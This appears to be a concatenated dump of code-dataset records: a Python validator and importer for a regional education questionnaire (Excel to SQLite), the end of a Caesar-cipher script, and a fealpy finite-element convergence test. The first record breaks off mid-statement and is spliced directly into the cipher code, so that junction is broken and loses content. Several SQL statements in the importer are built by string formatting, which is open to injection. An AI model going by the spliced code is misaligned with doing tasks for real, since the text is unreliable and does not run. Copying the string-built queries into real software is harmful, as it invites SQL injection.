self.print_log(\"\\n\", True)\n self.add_data_issues(tab,table,'region_totals',col)\n self.print_log(\"The regional figures do not add up to the country total in {0} column {1}\\n\".format(table,col), True)\n pass_test=False\n cursor.close()\n if pass_test :\n self.print_log(\"Test passed.\\n\", True) \n return(pass_test)\n\n def check_less(self):\n \"\"\"Checks that certain columns are less or equal than others.\n \n Checks that the list of pairs in each each key in\n check_less_dictionary satisfy that the first one is smaller\n than the second one.\n\n \"\"\"\n check_less_dictionary={\n ## All the inequalities correspond to the first table\n 'Table 0.1' : [ [16,14], [17,15], [13,12] ],\n 'Table 1.1' :[ [4,3], 
[6,5],[8,7],[10,9],[12,11],[14,13] ],\n 'Table 2.1' :[ [4,3], [6,5],[8,7],[10,9],[12,11],[14,13] ],\n 'Table 3.1' :[ [4,3], [6,5],[8,7],[10,9],[12,11],[14,13] ],\n 'Table 4.1' :[ [4,3], [6,5],[8,7],[10,9],[12,11],[14,13] ]\n }\n table_sheet_dictionary={\n 'Table 0.1' : 'Pupils' ,\n 'Table 1.1' : 'Teachers ISCED 1' ,\n 'Table 2.1' : 'Teachers ISCED 2' ,\n 'Table 3.1' : 'Teachers ISCED 3' ,\n 'Table 4.1' : 'Teachers ISCED 23'\n }\n cursor=self.conn.cursor()\n pass_test=True\n self.print_log(\"Checking that parts are less than the totals...\", True)\n for table,pairs_list in check_less_dictionary.items():\n sheet_name=table_sheet_dictionary[table]\n if sheet_name not in self.wb.sheet_names():\n continue\n sheet=self.wb.sheet_by_name(sheet_name)\n for pairs in pairs_list:\n cursor.execute(\"SELECT EXL_REF FROM RM_MAPPING WHERE RM_TABLE=\\'{}\\' AND Col={}\".format(table,pairs[0]))\n ref_smaller=cursor.fetchone()[0]\n cursor.execute(\"SELECT EXL_REF FROM RM_MAPPING WHERE RM_TABLE=\\'{}\\' AND Col={}\".format(table,pairs[1]))\n ref_bigger=cursor.fetchone()[0]\n smaller_meter_starting_coordinates = indexes(ref_smaller)\n bigger_meter_starting_coordinates = indexes(ref_bigger)\n smaller_meter_values=sheet.col_values(smaller_meter_starting_coordinates[1],\n smaller_meter_starting_coordinates[0],\n smaller_meter_starting_coordinates[0]+self.nadm1)\n bigger_meter_values=sheet.col_values(bigger_meter_starting_coordinates[1],\n bigger_meter_starting_coordinates[0],\n bigger_meter_starting_coordinates[0]+self.nadm1)\n rows_with_problem=[]\n for i in range(self.nadm1):\n ## Error para el log\n small_value=smaller_meter_values[i]\n big_value=bigger_meter_values[i]\n if (type(small_value) in [int,float] and type(big_value) in [int,float] and small_value > big_value):\n rows_with_problem=rows_with_problem+[i+1]\n if pass_test:\n self.print_log(\"\\n\", True)\n self.print_log(\"{}: In row {} the value of column {} is bigger than the value in column {}.\\n\".format(sheet_name,i+1,pairs[0],pairs[1]), True)\n pass_test=False\n if rows_with_problem:\n self.add_data_issues(sheet_name, table,'check_less',[pairs[0],pairs[1],rows_with_problem ])\n \n cursor.close()\n if pass_test :\n self.print_log(\"Test passed.\\n\", True) \n return(pass_test)\n\n\n def add_values(self,x,y):\n \"\"\"If both x and y are numbers returns their sum. Otherwise the value of one of them.\"\"\" \n if ( type(x) in [int,float] and type(y) in [int,float]):\n return(x+y)\n elif( type(x) not in [int,float] ):\n return(x)\n else:\n return(y)\n\n def are_equal(self,x,y):\n \"\"\"Checks is x and y are equal numbers. \n\n Returns True if both x and y are numbers and they are equal or\n if at least one of the values is not a number. Otherwise it\n returns False.\n \"\"\"\n if ( ( (type(x) in [int,float] ) and (type(y) in [int,float]) and x==y) or ( (type(x) not in [int,float] ) or (type(y) not in [int,float]) ) ):\n return(True)\n else:\n return(False)\n \n def check_column_sums(self):\n \"\"\"Checks columns that have to add up to other columns.\n \n Some pairs of columns are supposed to add up to other\n columns. This method checks that this is the case based on the\n local variable check_columns_sums_dictionary. In that\n dictionary, the keys are table names and the value is a list\n with pairs. Each pair has as a first element a list of column\n numbers and the second element is another column number. 
It is\n checked that the sum of the values in the columns in the list\n (the first element in the pair), add up to the single column\n number (the second element in the pair).\n\n \"\"\"\n check_columns_sums_dictionary={\n ## Each item has two items. The first item is a list whose\n ## terms have to add up to the second item\n 'Table 1.1' : [ [[20,21,22],3 ],[[23,24,25],7] ],\n 'Table 2.1' : [ [[26,27,28],3] , [[29,30,31],7 ] ],\n 'Table 3.1' : [ [[26,27,28],3] , [[29,30,31],7 ] ],\n 'Table 4.1' : [ [[26,27,28],3] , [[29,30,31],7 ] ],\n 'Table 1.2' : [ [[3,4,5,6,7,8,9,10],3 ],[[11,12,13,14,15,16,17,18],7 ],[ [19,20,21,22,23,24,25,26],11 ] ],\n 'Table 2.2' : [ [[3,4,5,6,7,8,9,10],3 ],[[11,12,13,14,15,16,17,18],7 ],[ [19,20,21,22,23,24,25,26],11 ] ],\n 'Table 3.2' : [ [[3,4,5,6,7,8,9,10],3 ],[[11,12,13,14,15,16,17,18],7 ],[ [19,20,21,22,23,24,25,26],11 ] ],\n 'Table 4.2' : [ [[3,4,5,6,7,8,9,10],3 ],[[11,12,13,14,15,16,17,18],7 ],[ [19,20,21,22,23,24,25,26],11 ] ],\n 'Table 1.3' : [ [[3,5,6,7,8,9,10],3 ] , [[11,13,14,15,16,17,18],7] , [[19,21,22,23,24,25,26 ],11 ] ],\n 'Table 2.3' : [ [[3,5,6,7,8,9,10],3 ] , [[11,13,14,15,16,17,18],7] , [[19,21,22,23,24,25,26 ],11 ] ],\n 'Table 3.3' : [ [[3,5,6,7,8,9,10],3 ] , [[11,13,14,15,16,17,18],7] , [[19,21,22,23,24,25,26 ],11 ] ],\n 'Table 4.3' : [ [[3,5,6,7,8,9,10],3 ] , [[11,13,14,15,16,17,18],7] , [[19,21,22,23,24,25,26 ],11 ] ],\n 'Table 1.4' : [ [[3,4,5,6,7,8,9],3], [ [10,11,12,13,14,15,16],7], [[17,18,19,20,21,22,23],11 ] ],\n 'Table 2.4' : [ [[3,4,5,6,7,8,9],3], [ [10,11,12,13,14,15,16],7], [[17,18,19,20,21,22,23],11 ] ],\n 'Table 3.4' : [ [[3,4,5,6,7,8,9],3], [ [10,11,12,13,14,15,16],7], [[17,18,19,20,21,22,23],11 ] ],\n 'Table 4.4' : [ [[3,4,5,6,7,8,9],3], [ [10,11,12,13,14,15,16],7], [[17,18,19,20,21,22,23],11 ] ],\n }\n cursor=self.conn.cursor()\n pass_test=True\n self.print_log(\"Checking sums of columns...\", True)\n for table_name,columns_sum_list in check_columns_sums_dictionary.items():\n cursor.execute(\"SELECT Tab FROM RM_Mapping WHERE RM_TABLE=\\'{}\\' LIMIT 1\".format(table_name))\n sheet_name=cursor.fetchone()[0]\n if sheet_name not in self.wb.sheet_names():\n continue\n sheet=self.wb.sheet_by_name(sheet_name)\n for columns_sum_info in columns_sum_list:\n summands_columns=columns_sum_info[0]\n total_column=columns_sum_info[1]\n ## We start by finding the totals\n \n ## First we accumulate the sums of the summans columns in a list\n accumulated_sum=[0]*self.nadm1\n for column_number in summands_columns:\n cursor.execute(\"SELECT EXL_REF FROM RM_Mapping WHERE RM_TABLE=\\'{}\\' and Col=\\'{}\\'\".format(table_name,column_number))\n ref=cursor.fetchone()[0]\n column_starting_coordinates= indexes(ref)\n column_meter_values=sheet.col_values(column_starting_coordinates[1],\n column_starting_coordinates[0],\n\n column_starting_coordinates[0]+self.nadm1)\n accumulated_sum=map(self.add_values, accumulated_sum,column_meter_values )\n ## Now we get the total values\n ## The total column is always in the first table of the sheet.\n total_table_name=table_name[0:8]+\"1\" \n cursor.execute(\"SELECT EXL_REF FROM RM_Mapping WHERE RM_TABLE=\\'{}\\' and Col=\\'{}\\'\".format(total_table_name,total_column))\n ref=cursor.fetchone()[0]\n column_starting_coordinates= indexes(ref)\n total_column_values=sheet.col_values(column_starting_coordinates[1],\n column_starting_coordinates[0],\n column_starting_coordinates[0]+self.nadm1)\n list_accumulated_sum=list(accumulated_sum)\n tests_vector=list(map( self.are_equal , list_accumulated_sum , total_column_values 
))\n rows_problem=[]\n for i in range(1,self.nadm1+1):\n if (not tests_vector[i-1]):\n rows_problem=rows_problem+[i]\n if rows_problem:\n ## We need to add a second argument to print_log here.\n self.add_data_issues(sheet_name,table_name,'column_sums',[summands_columns,total_column,rows_problem])\n self.print_log(\"Columns {} in {} do not add to column {} in {}. Problems in row(s) {}.\\n\".format(summands_columns,table_name,total_column,total_table_name,rows_problem), True)\n pass_test= (not rows_problem) and pass_test\n return(pass_test)\n\n def write_data_report(self):\n \"\"\"Writed the data report file.\n\n The data report is written after validation. If there is\n missing data it starts listing the sheet table and columns\n where there is missing data.\n\n Then, if there are data issues different than missing data, it\n prints the sheet table columns and data issue one by one based\n on the data issues dictionary.\n\n Finally it prints all the items that have \"No\" in the Checking\n sheet of the questionnaire.\n\n \"\"\"\n cursor=self.conn.cursor()\n data_report_path=self.log_folder + \"/{}\".format(self.country_name) + \"_\"+datetime.datetime.now().strftime(\"%y-%m-%d-%H-%M\")+\"_data_report.csv\"\n self.data_report_file=data_report_path\n file=open(data_report_path,'a')\n if ( not (self.missing_data_dictionary or self.data_issues_dictionary ) ):\n file.write('No data issues were found.,')\n else:\n if self.missing_data_dictionary:\n file.write(\"1. Missing data:,\\n\\n\")\n sheet_names_list=list(self.missing_data_dictionary.keys())\n sheet_names_list.sort()\n for sheet_name in sheet_names_list: \n file.write(\"Sheet: {},\\n\".format(sheet_name))\n table_list=list(self.missing_data_dictionary[sheet_name].keys())\n table_list.sort()\n for table in table_list :\n cursor.execute(\"SELECT RM_TABLE_NAME FROM RM_Mapping WHERE RM_TABLE=?\", (table,) )\n table_name=cursor.fetchone()[0]\n file.write(\",\\\"{0}: {1}\\\",\\n\".format(table,table_name))\n file.write(\",\\\"Missing data in column(s) {}\\\",\\n\".format( self.missing_data_dictionary[sheet_name][table] ))\n file.write(\"\\n\\n\")\n if self.data_issues_dictionary:\n file.write(\"2. 
Data Issues:,\\n\\n\")\n for sheet_name in self.data_issues_dictionary.keys():\n file.write(\"Sheet: {},\\n\".format(sheet_name))\n for table in self.data_issues_dictionary[sheet_name].keys():\n cursor.execute(\"SELECT RM_TABLE_NAME FROM RM_Mapping WHERE RM_TABLE=?\", (table,) )\n table_name=cursor.fetchone()[0]\n file.write(\",\\\"{0}: {1}\\\",\\n\".format(table,table_name))\n for issue in self.data_issues_dictionary[sheet_name][table].keys():\n if 'undefined_reference' == issue:\n file.write(\",\\\"Undefined reference(s) in column(s) {}.\\\",\\n\".format(self.data_issues_dictionary[sheet_name][table][issue]) )\n elif 'region_totals' == issue:\n file.write(\",\\\"Regional values do not add up to country value in column(s) {}.\\\",\\n\".format(self.data_issues_dictionary[sheet_name][table][issue]) )\n elif 'column_sums' == issue:\n for relevant_data in self.data_issues_dictionary[sheet_name][table][issue]:\n summands=relevant_data[0]\n total_column=relevant_data[1]\n rows=relevant_data[2]\n file.write(\",\\\"Column(s) {0} do not add up to column {1} on row(s) {2}.\\\",\\n\".format(summands,total_column,rows))\n elif 'check_less' == issue:\n for relevant_data in self.data_issues_dictionary[sheet_name][table][issue]:\n smaller_column=relevant_data[0]\n bigger_column=relevant_data[1]\n rows=relevant_data[2]\n file.write(\",\\\"Value in column {0} is greater than value in column {1} on row(s) {2}.\\\",\\n\".format(smaller_column,bigger_column,rows))\n ## If it is an original questionnaire print in the data reports if there are nos.\n if(not self.edit_mode):\n check_variables=pre_vars[\"Checking sheet\"]\n sheet=self.wb.sheet_by_name(\"Checking sheet\")\n printed_main_message=False\n for sheet_name in check_variables.keys():\n for var in [[x, check_variables[sheet_name][1] ] for x in check_variables[sheet_name][0] ]:\n if( sheet.cell( *var ).value == 'No' ):\n if(not printed_main_message): \n file.write(\"\\n\\nThe following items have No in the Checking sheet:\\n\")\n printed_main_message=True\n var[1]-=5\n file.write(\"\\\"{0}:\\\", \\\"{1}\\\"\\n\".format( sheet_name, sheet.cell(*var).value ))\n cursor.close()\n file.close()\n \n def emc_id_from_cell_info(self,sheet_name,xlrd_vector_coordinates):\n \"\"\"Returns the emc_id given cell xlrd coordinates.\n\n xlrd_vector_coordinates should be a list with the xlrd\n coordinates.\n sheet_name is the name of the sheet in which the cell is.\n \"\"\"\n excel_ref=indexes_inverse(xlrd_vector_coordinates)\n row=xlrd_vector_coordinates[0]\n col_ref=None\n # col_ref contains the EXL_REF that can be found in the\n # Rm_Mapping table.\n if (sheet_name==\"Pupils\" and ( (row>= 17 and row<=16+self.nadm1) or row==18+self.nadm1) ):\n col_ref=re.sub(\"[0-9]+\",\"18\",excel_ref )\n elif ( sheet_name==\"Administrative divisions\" and ( (row>= 20 and row<=19+self.nadm1) or row==21+self.nadm1) ) :\n col_ref=re.sub(\"[0-9]+\",\"21\",excel_ref )\n elif ( (row>= 18 and row<=17+self.nadm1) or row==19+self.nadm1) :\n col_ref=re.sub(\"[0-9]+\",\"19\", excel_ref )\n\n cursor=self.conn.cursor()\n cursor.execute(\"SELECT EMC_ID FROM RM_Mapping WHERE EXL_REF = '{0}' AND Tab = '{1}' ;\".format(col_ref,sheet_name ) )\n emc_id=cursor.fetchone()\n if emc_id:\n emc_id=emc_id[0]\n ## We can only make comments on region names in the administrative divisions sheet.\n if ( (emc_id in [900001,900002]) and sheet_name!=\"Administrative divisions\" ):\n emc_id=None\n cursor.close()\n return(emc_id)\n\n def extract_comments(self):\n \"\"\"Writes the cell comments to the comments table.\n 
\"\"\"\n # Tuple of tuples with the information of the data Each entry\n # will be (emc_id,co_code,adm_code,emco_year,comments)\n\n # Missing: Check that the comment should be in the meters\n cursor=self.conn.cursor()\n edu_table_name=\"EDU_FTN97_\"+self.database_type\n for sheet in self.wb.sheets():\n cursor.execute(\"SELECT {0}.CO_CODE,{0}.EMCO_YEAR,{0}.EMC_ID,RM_Mapping.Tab FROM {0} LEFT JOIN RM_MAPPING ON {0}.EMC_ID=RM_MAPPING.EMC_ID WHERE RM_Mapping.Tab=\\\"{3}\\\" AND ( ( {0}.EMCO_YEAR={1} AND RM_MAPPING.CUR_YEAR=0 ) OR ( {0}.EMCO_YEAR={2} AND RM_MAPPING.CUR_YEAR=-1) )\".format(edu_table_name,self.emco_year,self.emco_year-1,sheet.name) )\n things_to_erase=cursor.fetchall()\n for values_to_erase in things_to_erase:\n cursor.execute(\"DELETE FROM EDU_FTN97_\"+self.database_type+\" WHERE CO_CODE={0} AND EMCO_YEAR={1} AND EMC_ID={2}\".format(values_to_erase[0],values_to_erase[1],values_to_erase[2]))\n self.conn.commit()\n \n #delete from Authors where AuthorId=1 \n comments_table_tupple=() \n for sheet in self.wb.sheets(): \n for xlrd_coord in sheet.cell_note_map.keys():\n \n emc_id=self.emc_id_from_cell_info(sheet.name, xlrd_coord )\n if emc_id:\n emco_year=self.emco_year\n cursor.execute(\"SELECT RM_TABLE FROM RM_Mapping WHERE EMC_ID={0} limit 1;\".format(emc_id))\n \n table1=cursor.fetchone()[0][5:]\n ## If it is table i, we are in administrative divisions\n ## so we set the table to -1.\n if (table1==\" i\"):\n table=-1\n else:\n table=float( table1 )\n if (sheet.name== \"Pupils\"):\n adm_code=xlrd_coord[0]-16\n if adm_code>self.nadm1:\n adm_code=0\n elif (sheet.name!= \"Administrative divisions\"):\n adm_code=xlrd_coord[0]-17\n if adm_code>self.nadm1:\n adm_code=0\n #OLD CODE\n # if (emc_id in [20162,20166,20172,20184] and xlrd_coord[1] == 21 ):\n # emco_year= emco_year - 1\n # ENDS OLD CODE\n else:\n adm_code=xlrd_coord[0]-19\n if adm_code>self.nadm1:\n adm_code=0 \n comment=sheet.cell_note_map[xlrd_coord].text\n if not self.edit_mode:\n author=self.country_name\n else:\n author=sheet.cell_note_map[xlrd_coord].author\n match=re.search('\\[(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2})\\] (.*)',comment, re.MULTILINE|re.DOTALL)\n if match==None:\n date_string=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") # We are not forced to use this format\n else:\n date_string=match.group(1)\n comment=match.group(2)\n\n \n comments_table_tupple=comments_table_tupple + ( (self.country_code,adm_code,emco_year, emc_id,comment,table,author,date_string) , )\n if comments_table_tupple:\n cursor.executemany(\"INSERT OR REPLACE INTO EDU_FTN97_\"+self.database_type+\"(CO_CODE,ADM_CODE,EMCO_YEAR,EMC_ID,FTN_CODE,FTN_DATA,NTABLE,QUESTNAME,USERNAME,DATE_ADDED)\" + \" VALUES(?,?,?,?,1,?,?,'R',?,?);\", comments_table_tupple )\n self.conn.commit()\n cursor.close()\n\n def read_regions_from_sheet(self):\n \"\"\"Reads region names from the questionnaire.\n \n It reads the region names from the questoinnaire and creates\n the attribute self.regions_from_sheet containing the read names.\n \"\"\"\n administrative_divisions_variables=pre_vars['fixed_sheets']['Administrative divisions']\n sheet=self.wb.sheet_by_name('Administrative divisions')\n id_start_coordinates=indexes( administrative_divisions_variables['id_start'][0])\n self.regions_from_sheet=sheet.col_values(id_start_coordinates[1]+1,\\\n id_start_coordinates[0],\\\n id_start_coordinates[0]+self.nadm1)\n\n \n def compare_region_names(self):\n \"\"\"Compares region names in sheet and database.\n \n Returns 1 if regions do not exist in the database. 
If they\n        exist, returns True if names in the database are the same as\n        in the sheet and False otherwise.\n\n        \"\"\"\n        if (self.regions_from_sheet is None):\n            self.read_regions_from_sheet()\n        regions_from_database=self.get_regions()\n        if (not regions_from_database):\n            return(1)\n        else:\n            regions_from_database=list(map(str.upper,regions_from_database ))\n            regions_from_sheet=list(map(str.upper, self.regions_from_sheet ))\n            return ( regions_from_database == regions_from_sheet )\n        \n    def insert_region_codes(self):\n        \"\"\"Writes the regions from the sheet to the regions database.\n\n        If the regions exist already in the database this function\n        overwrites them.\n\n        \"\"\"\n        cursor=self.conn.cursor()\n        administrative_divisions_variables=pre_vars['fixed_sheets']['Administrative divisions']\n        sheet=self.wb.sheet_by_name('Administrative divisions')\n        id_start_coordinates=indexes( administrative_divisions_variables['id_start'][0]) \n        regions_index=list(map(int,sheet.col_values(id_start_coordinates[1],\\\n                                                    id_start_coordinates[0],\\\n                                                    id_start_coordinates[0]+self.nadm1)))\n\n        sql_values=tuple(map(lambda x,y,z: (x,y,z, self.emco_year), [self.country_code] * self.nadm1 , regions_index, self.regions_from_sheet ))\n        ## Adding national level\n        sql_values = sql_values + ((self.country_code, 0, 'National level', self.emco_year),)\n        cursor.executemany(\"INSERT OR REPLACE INTO REGIONS VALUES(?,?,?,?);\",sql_values)\n        self.conn.commit()\n        cursor.close()\n        \n    def get_regions(self):\n        \"\"\"Returns a tuple with the names of the regions, in order, taken from the database.\n\n        The regions are read from the database. If no regions are\n        found in the database, this function returns False.\n        \"\"\"\n        cursor=self.conn.cursor()\n        cursor.execute(\"SELECT ADM_NAME FROM REGIONS WHERE CO_CODE=? AND ADM_CODE>0 AND MC_YEAR=? ORDER BY ADM_CODE ASC;\",(self.country_code,self.emco_year) )\n        sql_return=cursor.fetchall()\n        cursor.close()\n        if sql_return:\n            sql_return=reduce(lambda x,y: x+y,sql_return)\n            return(sql_return)\n        else:\n            return(False)\n        \n    def extract_table_comments(self):\n        \"\"\"Extracts the comments from the top of each table.\n        \n        This function can also be used with the edit mode.\n        \"\"\"\n        cursor=self.conn.cursor()\n        comments_data=()\n        cursor.execute(\"SELECT Tab,RM_TABLE,AC,EXL_REF FROM RM_Mapping_NonNumeric WHERE AC=\\\"Table_COMM\\\"\")\n        comments_info=cursor.fetchall()\n        for variables in comments_info:\n            tab=variables[0]\n            if tab in self.wb.sheet_names():\n                rm_table=variables[1]\n                exl_ref=variables[3]\n                sheet = self.wb.sheet_by_name(tab)\n                comments=sheet.cell(*indexes(exl_ref)).value\n                if comments != \"Enter comment here\":\n                    comments_data=comments_data + ( (self.country_code,self.emco_year,rm_table,comments ), )\n        cursor.executemany(\"INSERT OR REPLACE INTO EDU_COMMENT_TABLE_\"+self.database_type+\" VALUES(?,?,?,?);\",comments_data)\n        self.conn.commit()\n        cursor.close()\n\n    \n    def extract_data(self,write_sql=True):\n        \"\"\"Reads and exports the data of the questionnaire.\n\n        If the argument write_sql is True, it will import all the data\n        to the sql database. 
Otherwise the data will be read but not\n stored (useful only for testing purposes).\n \"\"\"\n cursor=self.conn.cursor()\n # Tupples that will contain all the data\n meters_data=()\n inclu_data=()\n # For the sql file we use a set in order to avoid repetitions\n referenced_sql_code=set()\n\n def export_to_sqlite():\n \"\"\"Exports the data to the sqlite database.\n\n This function imports the values read from the\n questionnaire to the database and also adds them to the\n audit trail with the current timestamp.\n \"\"\"\n cursor=self.conn.cursor()\n ## Copy old values from\n \n if self.edit_mode:\n cursor.execute(\"DELETE FROM METER_AUDIT_TEMP\")\n for Table in self.wb.sheet_names():\n cursor.execute((\"INSERT INTO METER_AUDIT_TEMP (MC_ID, CO_CODE, ADM_CODE, MC_YEAR, \"\n \"EM_FIG_OLD, MQ_ID_OLD, MG_ID_OLD, USER_NAME, SERIES, SURVEY_ID) \"\n \"SELECT c.EMC_ID,c.CO_CODE, c.ADM_CODE, c.EMCO_YEAR,\"\n \"c.EM_FIG, c.MQ_ID, c.MG_ID, '{4}', '{5}', 'RM' from RM_MAPPING as a \"\n \"LEFT JOIN EDU_METER_AID AS b ON b.AC = a.AC \"\n \"JOIN EDU_METER97_{5} as c ON b.EMC_ID = c.EMC_ID \"\n \"WHERE a.Tab='{0}' AND c.CO_CODE = {1} AND \"\n \"(( c.EMCO_YEAR= {2} AND a.CUR_YEAR=0 ) OR ( c.EMCO_YEAR= {3} AND a.CUR_YEAR=-1))\".format(Table,self.country_code, self.emco_year,self.emco_year-1,self.username, self.database_type)))\n \n cursor.executemany(\"INSERT OR REPLACE INTO EDU_METER97_\"+ self.database_type +\" VALUES(?,?,?,?,?,?,?,?,?,?,?,?);\",meters_data)\n for var in referenced_sql_code:\n cursor.execute(var)\n self.conn.commit()\n \n if self.edit_mode:\n cursor.execute((\"INSERT INTO METER_AUDIT_TRAIL \" \n \"(MC_ID, CO_CODE, ADM_CODE, MC_YEAR, EM_FIG_OLD, MQ_ID_OLD, \"\n \"MG_ID_OLD, USER_NAME, SERIES, SURVEY_ID, EM_FIG_NEW, MQ_ID_NEW, MG_ID_NEW) \" \n \"SELECT a.MC_ID, a.CO_CODE, a.ADM_CODE, a.MC_YEAR,\" \n \"a.EM_FIG_OLD, a.MQ_ID_OLD, a.MG_ID_OLD,\" \n \"a.USER_NAME, a.SERIES, a.SURVEY_ID,\" \n \"b.EM_FIG, b.MQ_ID, b.MG_ID from METER_AUDIT_TEMP as a \"\n \"join EDU_METER97_\"+ self.database_type +\" as b on a.MC_ID = b.EMC_ID \"\n \"and a.CO_CODE = b.CO_CODE and a.ADM_CODE = b.ADM_CODE \"\n \"and a.MC_YEAR = b.EMCO_YEAR AND \"\n \"(a.EM_FIG_OLD !=b.EM_FIG OR a.MQ_ID_OLD != b.MQ_ID OR a.MG_ID_OLD != b.MG_ID)\"))\n cursor.execute(\"DELETE FROM METER_AUDIT_TEMP\")\n self.conn.commit()\n query_script=\"\"\n for Table in self.wb.sheet_names():\n query_script=query_script+\"\"\"INSERT INTO METER_AUDIT_TEMP (MC_ID, CO_CODE, ADM_CODE, MC_YEAR,EM_FIG_OLD, USER_NAME, SERIES, SURVEY_ID) SELECT EDU_INCLUSION_{5}.EMC_ID,EDU_INCLUSION_{5}.CO_CODE, EDU_INCLUSION_{5}.ADM_CODE, EDU_INCLUSION_{5}.EMCO_YEAR,EDU_INCLUSION_{5}.DESC_INCLU, '{4}', '{5}', 'RM' from RM_MAPPING LEFT JOIN EDU_METER_AID ON EDU_METER_AID.AC = RM_MAPPING.AC JOIN EDU_INCLUSION_{5} ON EDU_METER_AID.EMC_ID = EDU_INCLUSION_{5}.EMC_ID WHERE RM_MAPPING.Tab='{0}' AND EDU_INCLUSION_{5}.CO_CODE = {1} AND (( EDU_INCLUSION_{5}.EMCO_YEAR={2} AND RM_MAPPING.CUR_YEAR=0) OR (EDU_INCLUSION_{5}.EMCO_YEAR={3} AND RM_MAPPING.CUR_YEAR=-1));\\n\\n\"\"\".format(Table,self.country_code, self.emco_year,self.emco_year-1,self.username, self.database_type ) \n cursor.executescript(query_script)\n \n edit_sheets_names=self.wb.sheet_names()\n ## Before exporting the entries in the inclusion table of\n ## the sheets being imported are erased.\n inclu_table_name=\"EDU_INCLUSION_\"+self.database_type\n for sheet in self.wb.sheets():\n cursor.execute(\"SELECT {0}.CO_CODE,{0}.EMCO_YEAR,{0}.EMC_ID,RM_Mapping.Tab FROM {0} LEFT JOIN RM_MAPPING ON {0}.EMC_ID=RM_MAPPING.EMC_ID WHERE 
RM_Mapping.Tab=\\\"{3}\\\" AND ( ( {0}.EMCO_YEAR={1} AND RM_MAPPING.CUR_YEAR=0 ) OR ( {0}.EMCO_YEAR={2} AND RM_MAPPING.CUR_YEAR=-1) )\".format(inclu_table_name,self.emco_year,self.emco_year-1,sheet.name) )\n things_to_erase=cursor.fetchall()\n for values_to_erase in things_to_erase:\n cursor.execute(\"DELETE FROM EDU_INCLUSION_\"+self.database_type+\" WHERE CO_CODE={0} AND EMCO_YEAR={1} AND EMC_ID={2}\".format(values_to_erase[0],values_to_erase[1],values_to_erase[2]))\n self.conn.commit()\n\n cursor.executemany(\"INSERT OR REPLACE INTO EDU_INCLUSION_\"+self.database_type+\" VALUES(?,?,?,?,?,?);\",inclu_data)\n self.conn.commit()\n \n if self.edit_mode:\n cursor.execute((\"INSERT INTO METER_AUDIT_TRAIL \" \n \"(MC_ID, CO_CODE, ADM_CODE, MC_YEAR, EM_FIG_OLD, \"\n \"USER_NAME, SERIES, SURVEY_ID, EM_FIG_NEW) \" \n \"SELECT a.MC_ID, a.CO_CODE, a.ADM_CODE, a.MC_YEAR,\" \n \"a.EM_FIG_OLD, a.USER_NAME, a.SERIES, a.SURVEY_ID,\" \n \"b.DESC_INCLU from METER_AUDIT_TEMP as a \"\n \"join EDU_INCLUSION_{0} as b on a.MC_ID = b.EMC_ID \"\n \"and a.CO_CODE = b.CO_CODE and a.ADM_CODE = b.ADM_CODE \"\n \"and a.MC_YEAR = b.EMCO_YEAR AND \"\n \"(a.EM_FIG_OLD !=b.DESC_INCLU)\".format(self.database_type)))\n cursor.execute(\"DELETE FROM METER_AUDIT_TEMP\")\n self.conn.commit()\n cursor.close()\n\n def backup_imported_questionnaire():\n \"\"\"Puts a copy of the questionnaire in the Imports folder.\n \"\"\"\n import_folder=\"./Import\"\n if (not os.path.exists(import_folder)):\n os.makedirs(import_folder)\n shutil.copy(self.excel_file,\"./Import/RM_{}_{}_{}.xlsx\".format(self.country_name,self.emco_year,datetime.datetime.now().strftime(\"%y-%m-%d-%H-%M\")))\n \n\n # RM_TABLE is necessary for finding the xlrd coordinates\n cursor.execute(\"SELECT TAB, EXL_REF, EMC_ID,RM_TABLE,Col FROM RM_MAPPING;\") \n mapping_table = cursor.fetchall()\n if self.edit_mode:\n edit_sheets_names=self.wb.sheet_names()\n else:\n names_test=self.compare_region_names()\n ## names_test==False if the names do not match.\n if ( names_test==1 ):\n self.insert_region_codes()\n else:\n file=open(self.data_report_file,'a')\n self.validation_log_file=open(self.validation_full_path ,'a')\n print(\"\\nError: Unmatching region names between sheet and database.\",end='')\n file.write(\"General errors,\\n\")\n file.write(\"\\nError: Unmatching region names between sheet and database.,\")\n database_regions=self.get_regions()\n ## number of regions in database:\n dnr=len(database_regions)\n ## number of regions in sheet\n snr=len(self.regions_from_sheet)\n nregions=max(dnr,snr)\n print(\"\\nDatabase region names: Sheet region names:\\n\",end='')\n file.write(\"\\nDatabase region names:, Sheet region names:\\n\")\n for i in range(0,nregions):\n if (i 26:\n newIndex = newIndex - 27\n newChar = alphaList[newIndex]\n encodedString = encodedString + newChar\n return encodedString\n \ndef decodeMessage(inputString, cipherKey):\n alphaList = list(string.ascii_lowercase)\n alphaList.append(\" \")\n inputList = list(inputString)\n decodedString = \"\"\n for char in inputList:\n originalIndex = alphaList.index(char)\n newIndex = originalIndex - cipherKey\n newChar = alphaList[newIndex]\n decodedString = decodedString + newChar\n return decodedString","repo_name":"DanBresc/Website","sub_path":"app/caesarCipherBackEnd.py","file_name":"caesarCipherBackEnd.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40709712994","text":"import numpy as np\n\nfrom fealpy.pde.poisson_2d import CosCosData\nfrom fealpy.functionspace import ConformingVirtualElementSpace2d\nfrom fealpy.mesh.simple_mesh_generator import triangle\nfrom scipy.sparse.linalg import spsolve\n\nmaxit = 6\np = 2\npde = CosCosData()\ndomain = pde.domain()\nh = 0.2\nerror = np.zeros(maxit)\nfor i in range(maxit):\n print(i)\n mesh = triangle(domain, h, meshtype='polygon')\n space = ConformingVirtualElementSpace2d(mesh, p=p, q=p+3)\n M = space.mass_matrix()\n F = space.source_vector(pde.solution)\n\n uh = space.function()\n uh[:] = spsolve(M, F).reshape(-1)\n\n sh = space.project_to_smspace(uh)\n\n def efun(x, cellidx=None):\n return (pde.solution(x) - sh(x, cellidx))**2\n\n error[i] = space.integralalg.error(efun, power=np.sqrt)\n h /= 2\n\nprint(error[:-1]/error[1:])\n\n","repo_name":"weihuayi/fealpy","sub_path":"example/oldexample/test/oldtest/test_cvem_L2.py","file_name":"test_cvem_L2.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"}
